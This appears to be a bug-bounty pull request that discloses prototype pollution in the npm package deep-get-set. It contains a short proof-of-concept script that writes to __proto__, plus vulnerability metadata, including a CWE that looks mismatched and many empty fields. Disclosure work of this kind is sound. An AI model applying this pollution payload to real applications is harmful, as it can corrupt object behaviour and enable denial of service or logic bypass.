### PR TITLE
 Prototype Pollution in deep-get-set

### DIFF
--- a/bounties/npm/deep-get-set/1/README.md
+++ b/bounties/npm/deep-get-set/1/README.md
@@ -1,0 +1,10 @@
+# Description
+```deep-set-get``` is a Set and get values on objects via dot-notation strings. 
+This package is vulnerable to prototype pollution. 
+
+# POC
+```
+const deep = require('deep-get-set');
+deep({},['__proto__','polluted'],true);
+console.log(polluted);
+```

--- a/bounties/npm/deep-get-set/1/vulnerability.json
+++ b/bounties/npm/deep-get-set/1/vulnerability.json
@@ -1,0 +1,49 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-09-08",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+      "Discloser": "d3m0n-r00t",
+      "Fixer": ""
+    },
+    "Package": {
+      "Registry": "npm",
+      "Name": "deep-get-set",
+      "URL": "https://www.npmjs.com/package/deep-get-set",
+      "Downloads": "2578"
+    },
+    "CWEs": [
+      {
+        "ID": "CWE-400",
+        "Description": ""
+      }
+    ],
+    "CVSS": {
+      "Version": "3.1",
+      "AV": "",
+      "AC": "",
+      "PR": "",
+      "UI": "",
+      "S": "",
+      "C": "",
+      "I": "",
+      "A": "",
+      "E": "",
+      "RL": "",
+      "RC": "",
+      "Score": "5.6"
+    },
+    "CVEs": [""],
+    "Repository": {
+      "URL": "https://github.com/acstll/deep-get-set",
+      "Codebase": ["JavaScript"]
+    },
+    "Permalinks": [""],
+    "References": [
+      {
+        "Description": "",
+        "URL": ""
+      }
+    ]
+  }


### PR DESCRIPTION
## ✍️ Description
```deep-set-get``` is a Set and get values on objects via dot-notation strings. 
This package is vulnerable to prototype pollution. 

## 🕵️‍♂️ Proof of Concept
```
const deep = require('deep-get-set');
deep({},['__proto__','polluted'],true);
console.log(polluted);
```
![poc](https://user-images.githubusercontent.com/29670330/92445539-21294380-f1d2-11ea-9734-c91bebb724e6.png)

## ✅ Checklist
**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_
